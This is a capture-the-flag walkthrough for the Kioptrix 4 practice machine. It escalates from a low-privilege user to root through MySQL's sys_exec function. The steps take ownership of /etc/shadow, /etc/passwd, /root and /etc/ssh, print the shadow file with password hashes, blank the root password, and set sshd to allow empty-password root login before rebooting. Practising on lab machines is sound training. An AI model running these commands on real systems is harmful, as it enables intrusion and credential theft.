$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

mysql -u root -h localhost

Let's play with system permissions:

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> SELECT sys_exec('chown john.john /etc/shadow');                                                                                                                                                            
+-----------------------------------------+
| sys_exec('chown john.john /etc/shadow') |
+-----------------------------------------+
| NULL                                    | 
+-----------------------------------------+
1 row in set (0.00 sec)

mysql>  SELECT sys_exec('chown john.john /etc/passwd');  
+-----------------------------------------+
| sys_exec('chown john.john /etc/passwd') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown -R john.john /root'); 
+--------------------------------------+
| sys_exec('chown -R john.john /root') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit

john@Kioptrix4:/home/loneferret$ cd /root
john@Kioptrix4:/root$ ls
congrats.txt  lshell-0.9.12
john@Kioptrix4:/root$ ls -la
total 44
drwxr-xr-x  4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-------  1 john john   59 2012-02-06 20:24 .bash_history
-rw-r--r--  1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 john john  625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 john john    1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 john john    1 2012-02-05 10:38 .mysql_history
-rw-------  1 john john    5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 john john  141 2007-10-20 07:51 .profile
drwx------  2 john john 4096 2012-02-06 11:43 .ssh

john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

Let us continue the game:

cat /etc/shadow
root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::


Let us change /etc/passwd to this:
root::0:0:root:/root:/bin/bash

And /etc/shadow to this:
root::::

Let us change now ssh config:

mysql> SELECT sys_exec('chown -R john.john /etc/ssh');
+-----------------------------------------+
| sys_exec('chown -R john.john /etc/ssh') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.01 sec)

vim sshd_config

# Package generated configuration file
# See the sshd(8) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
#UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile      %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog no
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

UsePAM no
"sshd_config" 77L, 1872C written


Let's reload the system:
mysql> SELECT sys_exec('reboot');                

Broadcast message from root@Kioptrix4
(unknown) at 15:40 ...

The system is going down for reboot NOW!
+--------------------+
| sys_exec('reboot') |
+--------------------+
| NULL               |
+--------------------+
1 row in set (0.02 sec)


Game over:
ssh root@192.168.180.136
root@Kioptrix4:~# ls -la
total 44
drwxr-xr-x  4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-------  1 john john   62 2016-07-05 15:51 .bash_history
-rw-r--r--  1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 john john  625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 john john    1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 john john    1 2012-02-05 10:38 .mysql_history
-rw-------  1 john john    5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 john john  141 2007-10-20 07:51 .profile
drwx------  2 john john 4096 2016-07-05 15:23 .ssh

Regards,
Yuriy Stanchev/URIX